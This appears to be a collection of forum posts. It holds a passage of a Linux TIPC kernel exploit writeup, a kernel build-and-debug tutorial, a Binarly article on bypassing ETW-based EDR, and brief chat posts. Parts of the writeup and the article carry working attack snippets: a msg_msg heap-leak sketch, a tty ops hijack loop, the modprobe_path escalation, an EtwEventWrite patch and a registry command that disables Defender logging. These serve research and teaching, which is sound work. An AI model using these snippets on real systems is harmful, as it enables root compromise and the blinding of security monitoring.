As detailed in the SentinelLabs writeup, the length of the kmalloc'd heap buffer is determined by taking the payload size from the TIPC packet header, after which the key is memcpy'd into this buffer with the length specified in the MSG_CRYPTO structure. At first you'd think that means the overflow uses uncontrolled data... but you can send TIPC packets that lie about the actual length of the payload (by making tipc_hdr.payload_size smaller than the actual payload size). This passes all the checks and reaches the memcpy without the remainder of the payload being discarded, giving us full control over the overflowed data. Great!

The attacker-controlled allocation size is passed to kmalloc directly. Smaller (up to 8KiB) heap objects allocated by the kernel using kmalloc end up in caches that are grouped by size (powers of two). You can have a peep at /proc/slabinfo and look at the entries prefixed by kmalloc- to get an overview of the general-purpose object cache sizes. Since we can control the size of the heap buffer that will be allocated and overflowed, we can pick in which of these caches our object ends up. This is a great ability, as it allows us to overflow into adjacent kernel objects of a similar size!

Defeating KASLR

If we want to do any kind of control flow hijacking, we're going to need an information leak to disclose (at least) some kernel text/data addresses so we can deduce the randomized base address. It would be great if we could find some kernel objects that contain a pointer/offset/length field early on in their structure, and that can be made to return data back to userland somehow. While googling I stumbled on this cool paper by some Pennsylvania State University students who dubbed objects with such properties "Elastic Objects". Their research on the subject is quite exhaustive and covers Linux, BSD and XNU... I definitely recommend checking it out.

Since we can pick arbitrarily sized allocations, we're free to target any convenient elastic object. I went with msg_msg, which is a popular choice amongst fellow exploitdevs. 😉

The structure of a msg_msg as defined in include/linux/msg.h:

/* one msg_msg structure for each message */
struct msg_msg {
    struct list_head m_list;
    long m_type;
    size_t m_ts;          /* message text size */
    struct msg_msgseg *next;
    void *security;
    /* the actual message follows immediately */
};

You can easily allocate msg_msg objects using the msgsnd system call, and they can be freed again using the msgrcv system call. These system calls are not to be confused with the sendmsg and recvmsg system calls btw, great naming scheme!
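To make this concrete, here's a hedged ctypes sketch of driving the SysV msg queue syscalls from Python (a C exploit would just call msgsnd/msgrcv directly; the flag values come from the Linux uapi headers, and the MSG_COPY peek used further below requires a kernel built with CONFIG_CHECKPOINT_RESTORE):

import ctypes
import ctypes.util
import struct

libc = ctypes.CDLL(ctypes.util.find_library("c"), use_errno=True)
IPC_CREAT, IPC_NOWAIT, MSG_COPY = 0o1000, 0o4000, 0o40000

qid = libc.msgget(0x1337, IPC_CREAT | 0o666)

# msgsnd allocates a msg_msg (header + text) in the matching kmalloc cache
buf = struct.pack("q", 1) + b"A" * 0x40     # long mtype, then message text
libc.msgsnd(qid, buf, 0x40, 0)

# ... the TIPC overflow would happen here, enlarging the victim's m_ts ...

# MSG_COPY peeks at message index 0 without unlinking it, so the trampled
# m_list pointers are never dereferenced for an unlink
out = ctypes.create_string_buffer(0x2000 + 8)
n = libc.msgrcv(qid, out, 0x2000, 0, MSG_COPY | IPC_NOWAIT)
leak = out.raw[8:8 + n] if n > 0 else b""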
If we corrupt the m_ts field of a msg_msg object, we can extend its size and get a relative kernel heap out-of-bounds read back to userland when retrieving the message from the queue again using the msgrcv system call. A small problem with this is that overwriting the m_ts field also requires trampling over the struct list_head members (a prev/next pointer). When msgrcv is called and a matching message is found, it wants to unlink it from the linked list... but since we're still in the infoleak stage of the exploit, we can't put any legitimate/meaningful pointers in there. Luckily, there's a flag you can pass to msgrcv called MSG_COPY, which will make a copy of the message and not unlink the original one, avoiding a bad pointer dereference.

So the basic strategy is to line up three objects like this:

msg_msg
msg_msg
some_interesting_object

and proceed to free the first msg_msg object and allocate the MSG_CRYPTO key buffer into the hole it left behind. We corrupt the adjacent msg_msg using the buffer overflow and subsequently leak data from some_interesting_object using the msgrcv system call with the MSG_COPY flag set.

I chose to leak the data of tty_struct, which can easily be allocated by open'ing /dev/ptmx. This tty_struct holds all kinds of state related to the tty, and starts off like this:

struct tty_struct {
    int magic;
    struct kref kref;
    struct device *dev;   /* class device or NULL (e.g. ptys, serdev) */
    struct tty_driver *driver;
    const struct tty_operations *ops;
    int index;
    ...
}

A nice feature of this structure is the magic at the very start; it allows us to easily confirm the validity of our leak by comparing it against the expected value TTY_MAGIC (0x5401). A few members later we find struct tty_operations *ops, which points to a list of function pointers associated with various operations. This points to somewhere in kernel .data, and thus we can use it to defeat KASLR! Depending on whether the tty_struct being leaked belongs to a master pty or slave pty (they are allocated in pairs), we'll end up finding the address of ptm_unix98_ops or pty_unix98_ops. As an added bonus, leaking tty_struct also allows us to figure out the address of the tty_struct itself, because tty_struct.ldisc_sem.read_wait.next points to itself!

Getting $RIP (or panic tryin')

Naturally, the tty_operations pointer is a nice target for overwriting to hijack the kernel execution flow. So in the next stage of the exploit we start by spraying a bunch of copies of a fake tty_operations table. We can accurately guesstimate the address of one of these sprayed copies by utilizing the heap pointer we leaked in the previous step.

Now we repeatedly: allocate msg_msg, allocate tty_struct(s), free msg_msg, trigger the TIPC bug to (hopefully) overflow into a tty_struct. To confirm we actually overwrote (the first part of) a tty_struct, we invoke ioctl on the fd we got from opening /dev/ptmx; this will call tty_struct.ops.ioctl and should get us control over $RIP if we managed to hijack the ops pointer of this object. If that's not the case, we close() the pty again to not exhaust resources (a sketch of this probe loop follows below).

Avoiding ROP (mostly)

Where to jump to in the kernel? We could set up a ROP stack somewhere and pivot the stack into it... but this can get messy quick, especially once you need to do cleanup and resume the kernel thread like nothing ever happened.
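Backing up a step, the spray-and-probe loop just described might look roughly like this (my own reconstruction; trigger_overflow is a hypothetical stand-in for the TIPC trigger). The trick: a bogus ioctl cmd on a healthy pty fails with ENOTTY, while a hijacked ops->ioctl landing on a benign gadget returns 0.

import fcntl
import os

BOGUS_CMD = 0x41414141      # no real pty ioctl; normally fails with ENOTTY

def probe_round(trigger_overflow, spray=64):
    fds = [os.open("/dev/ptmx", os.O_RDWR | os.O_NOCTTY) for _ in range(spray)]
    trigger_overflow()      # hopefully corrupts one tty_struct's ops pointer
    for fd in fds:
        try:
            fcntl.ioctl(fd, BOGUS_CMD, 0)   # dispatches via tty->ops->ioctl
            return fd       # success: our fake ops->ioctl returned 0
        except OSError:
            os.close(fd)    # untouched tty, release it and keep looking
    return None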
If we look at the prototype of the ioctl callback from the ops list, we see:

int (*ioctl)(struct tty_struct *tty, unsigned int cmd, unsigned long arg);

We can set both cmd and arg from the userland invocation easily! So effectively we have an arbitrary function call where we control the 2nd and 3rd arguments (RSI and RDX respectively). Well, cmd is actually truncated to 32 bits, but that's good enough. Let's try to look for some gadget sequence that allows us to do an arbitrary write:

$ objdump -D -j .text ./vmlinux \
  | grep -C1 'mov %rsi,(%rdx)' \
  | grep -B2 ret
..
ffffffff812c51f5: 31 c0    xor %eax,%eax
ffffffff812c51f7: 48 89 32 mov %rsi,(%rdx)
ffffffff812c51fa: c3       ret
..

This one is convenient; it also clears rax, so the exploit can tell whether the invocation was a success. We now have some arbitrary 64-bit write gadget! (For some definition of arbitrary: the value is always 32 controlled bits plus 32 bits of zeroes, but whatever.)

Meet my friend: modprobe_path

Okay, we have this scuffed arbitrary write gadget we can repeatedly invoke, so what do we overwrite? Classic kernel exploits would target the cred structure of the current task to elevate the privileges to uid0. We could of course build an arbitrary read mechanism in the same way we built the arbitrary write... but let's try something else.

There are various scenarios in which the kernel will spawn a userland process (using the usermode_helper infrastructure in the kernel) to load additional kernel modules when it thinks that is necessary. The process spawned to load these modules is, of course, modprobe. The path to the modprobe binary is stored in a global variable called modprobe_path, and it can be set by a privileged user through the sysctl node /proc/sys/kernel/modprobe. This is a perfect candidate for overwriting using our write gadget. If we overwrite this path and convince the kernel it needs some additional module support, we can invoke any executable as root!

One of these modprobe scenarios is when you try to run a binary that has no known magic; in fs/exec.c we see:

/*
 * cycle the list of binary formats handler, until one recognizes the image
 */
static int search_binary_handler(struct linux_binprm *bprm)
{
    ..
    if (request_module("binfmt-%04x", *(ushort *)(bprm->buf + 2)) < 0)
    ..
}

request_module ends up invoking call_modprobe, which spawns a modprobe process based on the path from modprobe_path.

Closing Words

I hope you enjoyed the read. Feel free to reach out to point out any inaccuracies or give feedback. The full exploit can be found here.

Source: https://haxx.in/posts/pwning-tipc/
  8. Building and Debugging the Linux Kernel

BY DENNIS J. MCWHERTER, JR. - FEBRUARY 17, 2015

Recently, for the first time in a few months, I built the latest version of the Linux kernel. In fact, since I don't drink coffee, I decided to write this post while I waited for it to build. We'll take a quick look at where to get the official source code, how to compile it, and what tools there are for debugging it (short of rebooting your machine for every patch, of course). That said, I will shift much of the focus of this article onto actually running the built kernel and debugging it.

Where's teh codez?

The official Linux source tree can be found at Kernel.org. From here you can download the source in tarball form or take the latest release (at the time of writing, this is kernel v3.19, which is the tag I checked out). However, I recommend ingesting your source via git. Using git allows you to keep the tree up-to-date with the latest revisions and check out any previous version of the kernel source that you care about. In particular, I recently grabbed the source directly from the torvalds/linux.git repo. You will want to run:

git clone https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/

Once you have this copy of the source code, you can move around to any source revision you like or take a tagged build. To see a list of available tags, cd into the source directory and try:

git tag -l

Great, this is the first step to building your kernel. If you want more help with git, see this git primer or search around for others; there are many git resources available out there.

Building the Kernel

Since we're ready with our source code, we can build the kernel. Building the kernel is reasonably straightforward if you're familiar with typical Makefile projects, but there are other resources that contain more detail on this.

Ramdisk (optional). The first thing I like to do is create a ramdisk. I have found that about 3GB is sufficient for this. You can run something like the following to create a RAM disk at /media/ramdisk:

sudo mkdir -p /media/ramdisk
sudo mount -t tmpfs -o size=3072M tmpfs /media/ramdisk
# The next command copies the repo over
cp -r linux /media/ramdisk

This improves the overall performance of the build, since it can write the compiled code and read the source files out of RAM instead of off disk (i.e. disk is orders of magnitude slower than memory). However, the initial copying of the source will take some time, since it is reading from disk and copying into memory. NOTE: This is an optimization and in no way necessary for compiling the Linux kernel. Likewise, upon reboot, the contents of the RAM disk will be cleared (since RAM is volatile storage).

Caveat: Though I recommend performing all of your builds on your RAM disk for speed, this does cause an obvious synchronization problem between the files on your disk and the files in your RAM disk. I will leave the copying mechanism to you if you're performing active development, but one feasible solution is to simply continue using git to track your changes (perhaps an alternate remote would be useful here). Just be sure to push your changes before you delete the RAM disk or reboot.

Configuring the Kernel. The next step in the process is to create a configuration. You can use your current kernel's configuration or use the default one:

make defconfig

The above command will create a default kernel configuration for you.
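As an aside, if you'd rather not edit .config by hand for the debug options listed in the next step, the kernel tree ships a small helper script for this. Something along these lines should work (option names match the parameters below; olddefconfig fills in any newly exposed defaults):

./scripts/config --enable FRAME_POINTER --enable KGDB \
                 --enable KGDB_SERIAL_CONSOLE --enable DEBUG_INFO
make olddefconfig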
Alternatively, you can use make menuconfig to manually configure your kernel. Open up the generated configuration (i.e. the .config file) and make sure you have set the following parameters (for debugging):

CONFIG_FRAME_POINTER=y
CONFIG_KGDB=y
CONFIG_KGDB_SERIAL_CONSOLE=y
CONFIG_DEBUG_INFO=y

Build the kernel. After that, you'll want to actually build the kernel. The machine I'm using to compile the kernel has 4 cores, so I run the following command:

make -j4

At this point you'll want to walk away and get a cup of coffee if you drink it (otherwise, write a blog post). The number passed with the -j option to make signifies the number of threads you wish make to use for the compilation process (i.e. you should adjust this to be reasonable for the number of cores on your machine). With a 3GB RAM disk and 4 threads, this process takes about 15 minutes and 26 seconds on my virtual machine (not bad for a VM on a dinky little laptop).

Install the kernel. Congratulations, you've successfully built the Linux kernel on your own. Finally, we need to install the kernel so we can actually use it:

sudo make modules_install install

This command will put the kernel files alongside your current kernel. When this is done, you should be able to see the kernel files in /boot.

Qemu

Our kernel is built and now we want to test it. But naturally, we don't want to reboot for every change (and we didn't necessarily install it in the "right" place to do that, anyway). To do this, we'll use qemu. Qemu is a pretty nifty little "machine emulator and virtualizer." This tool will allow us to boot up our compiled kernel right in software and observe its behavior. We can similarly attach gdb for debugging this process, and it's much faster than performing full reboots on our machine to test the kernel we just built.

NOTE: If you're building a custom kernel for production, it is best to use qemu for prototyping and development, but obviously you should run thorough tests on the bare-metal machines. Since qemu is software that virtualizes the hardware, it is possible that there is a bug in emulation and behavior may vary.

To load our kernel in qemu, we'll run something similar to the following line:

qemu-system-x86_64 -kernel /boot/vmlinuz-3.19.0 -initrd /boot/initrd.img-3.19.0 -hda ~/rootfs.img -nographic -serial stdio -append "root=/dev/sda console=ttyS0"

This little gem will start qemu and boot your recently built kernel. However, we are missing a piece at this point. In particular, we have specified a rootfs (root filesystem) image, but we never created it. While the kernel should drop a shell even without the rootfs, it isn't really all that useful without it. I was running this on an Ubuntu VM, so we will use qemu-debootstrap to build this for us:

dd if=/dev/zero of=~/rootfs.img bs=200M count=1
mkfs.ext2 -F ~/rootfs.img
sudo mkdir /mnt/rootfs
sudo mount -o loop ~/rootfs.img /mnt/rootfs
sudo qemu-debootstrap --arch=i386 precise /mnt/rootfs
sudo cp /etc/passwd /etc/shadow /mnt/rootfs/etc
sync
sudo umount /mnt/rootfs

This set of commands will create a viable rootfs using Ubuntu's "precise" release as the base distribution. A quick summary follows:

1. Create a file of zeros ~200MB in size called rootfs.img
2. Format rootfs.img with the ext2 file system
3. Make a mount point for the image
4. Mount the image at the created mount point
5. Create the rootfs for "precise" in the mounted location
6. Copy over current system user data for login
7. Flush file buffers (i.e.
make sure we write changes)
8. Unmount the disk image

As you can see, all of the real work is handled for us by qemu-debootstrap. After we have run this, we should be able to start qemu. After issuing the command above, you should eventually see a login prompt appear in the qemu window. Log in with the credentials of your current machine (i.e. we copied /etc/passwd and /etc/shadow) and you should be able to use the system like normal. Similarly, uname -a should show you that you're running whatever kernel version you just compiled.

Debugging

We have successfully built our kernel and loaded it up in our emulator. Next up is debugging. Note that printk (the kernel's version of printf) is still very much your friend while working in the kernel, but some things are simply better looked at under the debugger when possible. For this purpose, KGDB was born, and that is why we enabled it earlier. Though the official KDB/KGDB docs are quite thorough on this topic, I will summarize here.

Start the kernel. Shut down your running kernel and modify the boot options slightly. We are going to tell kgdb to send the output to our ttyS0 at 115200 baud:

qemu-system-x86_64 -kernel /boot/vmlinuz-3.19.0 -initrd /boot/initrd.img-3.19.0 -hda ~/rootfs.img -nographic -serial tcp::4444,server -append "root=/dev/sda kgdboc=ttyS0,115200"

Similarly, we change how we will be interacting with our serial port. In particular, we have told qemu to listen on 0.0.0.0 port 4444 for a client until it starts. Since we only have a single serial device, this is now treated as ttyS0 instead of our console. We'll show why this is important later. In any case, you can start your debugger now by simply running:

gdb </path/to/kernel/build>/vmlinux
(gdb) target remote 127.0.0.1:4444

This connects gdb at the network location we told qemu to listen on. Though this is a network connection from the host's perspective, your kernel sees this as a direct serial connection because of the -serial option.

Drop the kernel into debug mode. The first thing we want to do is actually put the kernel in debug mode. Log in as root (or use sudo) and run the following command:

echo g > /proc/sysrq-trigger

If you compiled with the KDB frontend and don't have gdb attached, you should see kdb open up in your console. If, however, you followed the steps above and attached with gdb, control of the kernel should have been passed to the debugger. From here, you can operate gdb as you would with any other program.

NOTE: If you have trouble with gdb (i.e. it times out before you drop to debug mode), simply reconnect using the "target remote" command above. If it appears to be hanging when you first get into debug mode, simply stop debugging the process in gdb (i.e. CTRL + C) and reconnect. You should see a (gdb) prompt when the debugger has successfully connected to the kernel. If you want to continue kernel execution, simply type "continue".

There you have it: a more or less step-by-step guide to building and running your own version of the Linux kernel. This is more useful than just being the coolest kid amongst your friends. With this knowledge you can keep your kernel up-to-date with the latest fixes (before full point releases) and bake any custom code you find useful into your kernel. Happy kernel hacking!

Source: https://deathbytape.com/articles/2015/02/17/build-debug-linux-kernel.html
  9. DESIGN ISSUES OF MODERN EDRS: BYPASSING ETW-BASED SOLUTIONS

November 15, 2021 - Binarly Team

As experts in firmware security, the Binarly team is frequently asked why endpoint solutions can't detect threats originating below the operating system, such as firmware implant payloads. Unfortunately, the problem requires a more complex approach, and the architecture of modern Endpoint Detection & Response (EDR) solutions is weak against generic attack patterns. At Black Hat Europe 2021, Binarly researchers presented several attack vectors that weren't aimed at attacking a single solution, but instead exposed industry-wide problems.

The technical details of two new UEFI bootloader-based pieces of malware (FinSpy and ESPecter), which behave similarly to classical bootkits, have been published recently. However, instead of infecting legacy bootstrap code (MBR/VBR), they attack the UEFI-based bootloader to persist below the operating system. These types of threats can influence the kernel-space before all the mitigations apply. This allows an attacker to install kernel-mode implants or rootkit code very early in the boot process.

Previously published ETW bypasses rely on hooking/unhooking techniques to alter executable file loading with runtime changes such as reflective code injection ("You're off the hook" - ZeroNights 2016, Matrosov & Tang). With that in mind, the Binarly research chose to focus on uncovering ETW design problems and attacks that affect all the solutions relying on ETW telemetry. Firmware implants that deliver operating system payloads implementing these attacks will NOT be detected by modern endpoint solutions.

Design issues are the worst

Event Tracing for Windows (ETW) is a built-in feature, originally designed to perform software diagnostics, and nowadays ETW is widely used by Endpoint Detection & Response (EDR) solutions. Attacks on ETW can blind a whole class of security solutions that rely on telemetry from ETW. Researching ways to disable ETW is of critical importance, given that these attacks can disable the whole class of EDR solutions that rely on ETW for visibility into host events. Even more important is researching and developing ways to detect whether ETW has been tampered with and to notify the security solutions in place. This topic is very important for all the experts dealing with Windows security, malware detection and incident response.

Event Tracing for Windows (ETW) is a built-in Windows logging mechanism designed to observe and analyze application behavior. ETW was introduced quite a while ago (Windows XP) as a framework implemented in the kernel to troubleshoot OS component behavior and performance issues; since then, it has been expanded and improved significantly - in Windows 11, ETW can produce more than 50,000 event types from about 1,000 providers.

Using ETW to collect host telemetry has the following advantages:

- Available system-wide in all recent Windows OSs, without having to be installed, without loading any kernel drivers, and without rebooting the OS.
- Supports a standardized framework to produce and consume logging events.
- High-speed logging that lets applications consume events in real time or from a disk file.

ETW is used to collect events in large-scale business solutions such as Docker and Amazon CloudWatch. MS SQL Server has been using ETW for more than 10 years.
One of the first examples of using ETW-based tools to analyze and reveal malware behavior was presented by Mark Russinovich in his talk "Malware Hunting with the Sysinternals Tools" about 10 years ago. Since then, developers of modern EDRs have leveraged ETW to monitor security-related events and successfully detect and respond to cutting-edge malware. As an example, Process Monitor from the Sysinternals suite was leveraging the NT Kernel Logger ETW session for network tracing. Its latest version still relies on ETW for such visibility, but a dedicated ETW session, PROCMON TRACE, was introduced. During the Black Hat Europe 2021 talk, the Binarly team demonstrated an ETW attack on Process Monitor that resulted in blinding the Sysinternals tool from any network activity.

There are plenty of practical research projects demonstrating the ability of ETW to capture malicious activity or perform threat research and reverse engineering:

- DARPA has sponsored several ETW-based monitoring systems for malware detection.
- Project Windows Low-Level System Monitoring Data Collection obtains data from many ETW providers, including NT Kernel Logger, to reveal and reconstruct various attacks such as browser exploit attacks and malicious file downloads.
- Project MARPLE focuses on hardening enterprise security by automating the detection of APT threats. One of its modules, Holmes, collects host telemetry via ETW to produce detection signals for APT campaigns.
- Project APTShield uses ETW for logging system call routines. This scheme helps to detect RATs by analyzing malicious behavior such as keylogging, screen grabbing, remote shells, audio recording and unauthorized registry manipulation.
- MITRE built an ETW-based Security Sensor to detect process injection and to capture process creation and termination, as well as file creation and deletion events for certain filenames and paths.

ETW is also a hot topic in many academic papers, focused mostly on detecting malicious behavior:

- Malware Characterization Using Behavioral Components, from George Mason University
- Detecting File-less Malicious Behavior of .NET C2 Agents Using ETW, from the University of Amsterdam
- Tactical Provenance Analysis for Endpoint Detection and Response Systems, from the University of Illinois
- Etc.

According to the MITRE CVE database, in 2021 there was an exponential rise in the number of ETW-related vulnerabilities that received a CVE number, so it is safe to assume that ETW has caught the attention of bug hunters.

As discussed, ETW is helpful for gathering telemetry to defend against attacks, but it has drawbacks. One important drawback is that ETW has an opaque structure, including undocumented providers and providers that issue undocumented events - ETW event templates are stored in the PE resource section under the WEVT_TEMPLATE resource id.

ETW can also be leveraged by living-off-the-land malware:

- ETW can provide sniffer functionality for file & registry operations and process, thread & network activity
- ETW can provide keylogger functionality
- ETW can be used to flood the HDD in DDoS attacks, since events can be cached to disk in log files
- malware can use ETW to detect sandbox detonations
- some ETW providers are available only to certain Protected Process Light (PPL) processes; but malware can disable PPL on targeted processes via a kernel-mode driver without causing a BSOD - and then disable the "hidden" ETW providers

Unfortunately for the defenders, ETW can be BYPASSED!
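The best-known of the bypasses mentioned in the next paragraph is an in-process patch of the user-mode event writer. A hedged ctypes sketch (x64 assumed, where 0xC3 is ret; a real implant would do this inside its own process, and defenders increasingly watch for exactly this modification):

import ctypes

ntdll = ctypes.WinDLL("ntdll")
kernel32 = ctypes.WinDLL("kernel32")

# resolve ntdll!EtwEventWrite and make its first byte writable
addr = ctypes.cast(ntdll.EtwEventWrite, ctypes.c_void_p)
PAGE_EXECUTE_READWRITE = 0x40
old = ctypes.c_ulong(0)
kernel32.VirtualProtect(addr, 1, PAGE_EXECUTE_READWRITE, ctypes.byref(old))

ctypes.memmove(addr, b"\xc3", 1)   # ret: every provider write now no-ops
kernel32.VirtualProtect(addr, 1, old.value, ctypes.byref(old))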
Many ways to disable ETW logging are publicly available: from passing a TRUE boolean parameter into the nt!EtwpStopTrace function, to finding an ETW-specific structure and dynamically modifying it, to patching ntdll!EtwEventWrite or advapi32!EventWrite to return immediately, thus stopping the user-mode loggers.

Over the past several years, there have been many examples of malware families that implemented mitigations to evade ETW-based logging:

- In March 2018, Kaspersky released a report on Slingshot, a complex and previously unknown cyber-espionage platform targeting African and Middle East countries. Slingshot, the first-stage loader, renames the ETW logs by appending a .tmp extension to avoid leaving traces of its activity in system logs. Minisling, a module in the platform, uses the Microsoft-Windows-Kernel-General ETW provider to obtain the last reboot time and the Microsoft-Windows-Kernel-Power ETW provider to obtain the last unsuccessful attempt to turn the machine off.
- In 2019, LockerGoga ransomware implemented functionality to disable ETW by turning off tracing from the Microsoft-Windows-WMI-Activity provider via the wevtutil tool.
- In August 2021, TrendMicro researchers published the details of a new campaign from APT41 targeting South China Sea countries, which mentioned the use of two new shellcode loaders that can run payloads, uninstall themselves, disable ETW to evade detection, and also try out credentials.

MITRE has updated the Defense Evasion category to take these attacks into account by adding a new technique called "Indicator Blocking" as a separate sub-technique of the Impair Defenses technique. The ETW threat modeling is presented below:

[Figure: Threat Modeling ETW]

There are 5 types of attacks, designated by different colors, targeting each component of the ETW architecture:

- Red shows attacks on ETW from inside an Evil Process
- Light blue shows attacks on ETW by modifying environment variables, registry and files
- Orange shows attacks on user-mode ETW Providers
- Dark blue shows attacks on kernel-mode ETW Providers
- Purple shows attacks on ETW Sessions

The Binarly team recapped the most important publicly available bypasses during their Black Hat Europe 2021 talk. The most up-to-date summary of the ETW attacks by category is presented below:

Type of attack                                           Number of different techniques
Attacks from inside an evil process                      6
Attacks on ETW environment variables, registry, files    3
Attacks on user-mode ETW providers                       11
Attacks on kernel-mode ETW providers                     7
Attacks on ETW sessions                                  9
Total attacks                                            36

New attacks discovered by Binarly REsearch

Before introducing the new attack on Process Monitor presented by the Binarly team, let's talk a bit more about ETW sessions. An ETW session is a global object identified by a unique name that allows multiple ETW consumers to subscribe to and receive events from different ETW providers. To make matters more obfuscated, there is neither an API nor documentation on how to identify the session a consumer subscribes to for receiving events. EtwCheck (it will be released soon, stay tuned) is a powerful tool that can extract various kernel data, including the in-memory WMI_LOGGER_CONTEXT structures for the corresponding sessions. These structures contain the sessions' Security Descriptors, Flags and PIDs, which can help identify the applications that subscribe to these sessions.

The default number of simultaneously running sessions is 64. The NT kernel supports a maximum of 8 System Logger Sessions with hardcoded unique names.
Some examples of System Sessions include NT Kernel Logger, Global Logger, and Circular Kernel Context Logger. The NT Kernel Logger session receives telemetry from different providers implemented in ntoskrnl.exe and core OS drivers. One important key point, which will be leveraged in the attack on Process Monitor, is that Windows supports only one active NT Kernel Logger session at any time, but any application with admin privileges can start/stop this session.

Process Monitor is free and very popular for malware analysis, and it uses exactly the same technology as many EDRs. To receive network events, Process Monitor launches an ETW session as follows:

- Process Monitor versions up to 3.60 use the NT Kernel Logger session.
- Process Monitor version 3.85 uses a session called PROCMON TRACE.

[Figure: Process Monitor uses ETW to sniff network events]

From an attacker application, the running session that Process Monitor relies on is stopped and a fake one is started. As a result, Process Monitor stops receiving network events, and relaunching it does not fix the problem.

[Figure: ETW Hijacker blinds Process Monitor by stopping ETW sessions]

To demonstrate this attack, the Binarly team developed ETW Hijacker (it will be released soon, stay tuned), whose functionality is based on the following control flow:

[Figure: Block diagram of ETW Hijacker]

In the second attack introduced during the talk, the targeted application is Windows Defender and its secure ETW sessions:

Logger ID  Logger Name          Instance GUID                            Registry Path
4          DefenderApiLogger    {6B4012D0-22B6-464D-A553-20E9618403A2}   HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger
5          DefenderAuditLogger  {6B4012D0-22B6-464D-A553-20E9618403A1}   HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger

Each ETW session has an associated Security Descriptor, which is located in the registry under the HKLM\SYSTEM\CurrentControlSet\Control\WMI\Security key. The binary content of the security descriptor associated with DefenderApiLogger is written in the 6B4012D0-22B6-464D-A553-20E9618403A2 value, and the binary content of the security descriptor associated with DefenderAuditLogger is written in the 6B4012D0-22B6-464D-A553-20E9618403A1 value under that key. As can be seen in the next figure, the Security Descriptor stored in the registry matches the corresponding Security Descriptor in kernel memory (WMI_LOGGER_CONTEXT.SecurityDescriptor.Object).

[Figure: Security descriptor for DefenderApiLogger in the registry and in kernel memory]

One simple way to blind Windows Defender is to zero out the registry values corresponding to its ETW sessions:

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

Windows provides the QueryAllTracesW API to retrieve the properties and statistics of all ETW sessions for which the caller has permission to query. After calling this function, execution control goes to the kernel and finally to the EtwpQueryTrace function (its corresponding pseudocode is shown below). As can be seen in the pseudocode, the EtwpQueryTrace function includes several security checks to prevent returning information about a secure session to unprivileged applications. This is the reason why even apps with admin privileges can't query the Windows Defender ETW sessions. First, the access rights of the caller are checked by comparing the session security descriptor with the process token.
Second, it checks whether the queried session has its SecurityTrace flag set and implements one more check, based on the PPL mechanism, in the EtwCheckSecurityLoggerAccess function.

[Figure: The EtwpQueryTrace function checks two fields: the Security Descriptor and the SecurityTrace flag]

By default, users cannot query information about the Defender ETW sessions, since these sessions are running with high privilege and have the SecurityTrace flag enabled. Both session parameters, the security descriptor and the SecurityTrace flag, are stored in the WMI_LOGGER_CONTEXT structure. Malware can load a driver that patches the aforementioned values in the targeted WMI_LOGGER_CONTEXT structure to make the execution flow bypass the security checks and execute the EtwpGetLoggerInfoFromContext function.

[Figure: Malware can patch the WMI_LOGGER_CONTEXT structure to allow querying the Defender ETW sessions]

Now, moving on to stopping secure ETW sessions: Windows provides the StopTraceW function to stop a specified ETW session. After calling this function, execution control goes to the kernel and finally to the EtwpStopTrace function (its corresponding pseudocode is shown below). As can be seen in the pseudocode, the EtwpStopTrace function includes several security checks to prevent unprivileged applications from stopping a targeted secure session. This is the reason why even apps with admin privileges can't stop the Windows Defender ETW sessions. First, the session's "stoppable" characteristic is checked by querying the LoggerMode field in the WMI_LOGGER_CONTEXT structure. Second, the access rights of the caller are checked by comparing the session security descriptor with the process token.

[Figure: The EtwpStopTrace function checks LoggerMode and the Security Descriptor]

By default, users cannot stop the Defender ETW sessions, since they are running with high privilege and have been marked as non-stoppable. Both session parameters, the security descriptor and the LoggerMode field, are stored in the WMI_LOGGER_CONTEXT structure. Malware can load a driver that patches the aforementioned values in the targeted WMI_LOGGER_CONTEXT structure to make the execution flow bypass the security checks and execute the EtwpStopLoggerInstance function.

[Figure: Malware can patch the WMI_LOGGER_CONTEXT structure to allow stopping the Defender ETW sessions]

To summarize the attack: to query information about the target secure ETW session and then stop it, a malware driver has to patch three fields in the corresponding WMI_LOGGER_CONTEXT structure in memory.

[Figure: Summary of the Attack]

The demo on querying and stopping the Windows Defender ETW sessions presented during the talk can be found on the Binarly YouTube channel.

Windows PatchGuard is a software protection utility designed to forbid the kernel from being patched, in order to prevent rootkit infections. However, we can see from the demo that PatchGuard does not protect kernel ETW structures from illegal write access. To mitigate this risk, MemoryRanger can be used. MemoryRanger is a hypervisor-based utility designed to prevent attacks on kernel memory. After loading, MemoryRanger allocates a default enclave for the OS and previously loaded drivers. MemoryRanger traps the loading of the ETW Blinder driver and moves it into an isolated kernel enclave at run time, with different memory access restrictions. Using Extended Page Tables (EPT), MemoryRanger can trap access to the sensitive data and return fake data to the attacker.
[Figure: MemoryRanger can prevent patching ETW session structures]

The demo on how MemoryRanger can prevent patching the WMI_LOGGER_CONTEXT structure, presented at Black Hat Europe 2021, can be found on the Binarly YouTube channel.

In conclusion, ETW was originally designed to perform software diagnostics, but nowadays it is widely used by various EDRs and cybersecurity solutions. It is crucial to understand the attacks on ETW, because these attacks can disable a whole class of security solutions. During the talk we presented two new attacks, on Process Monitor and Windows Defender, and introduced two new tools that can help in identifying (EtwCheck) and preventing (MemoryRanger) attacks on ETW.

Going one step further, let's assume that an attack originates in the firmware, sets persistence, and executes a next-stage payload to move up into the kernel, where it can implement one of the attacks shown in this presentation. This would be devastating, due to its stealthiness and resilience to OS reinstallation or HDD replacement. That's why, today, security solutions MUST receive signals from both below and above the OS to be able to respond effectively to such threats.

Source: https://www.binarly.io/posts/Design_issues_of_modern_EDR’s_bypassing_ETW-based_solutions/index.html
  10. Playlist: https://www.youtube.com/playlist?list=PLwnDE0CN30Q9x3JMsHrRMGoLhpF8vZ1ka
  11. That platform seems OK, but problems keep popping up. It was nicer when we all stood outside, freezing like sausages.
  12. There are other problems with the template as well, such as huge icons when you hover the mouse over a user: I updated it recently, but it seems they haven't fixed them. They're not that bad though, and I don't feel like struggling to fix this kind of problem again; it's harder than it looks.
  13. Next week is DefCamp. So, shall we go somewhere to a terrace?
  14. I bunnyhop in CS:GO, so I have a good chance of dodging something like that.
  15. I think it was *ri# at the beginning, but I haven't tested it in many years.
  16. Nytro

    Black Friday

    I've also seen a few real discounts. Not very big ones, but real.
  17. Nytro

    Black Friday

    eMAG catalog: https://gadget.ro/catalogul-emag-pentru-black-friday-2021/ Opinions?
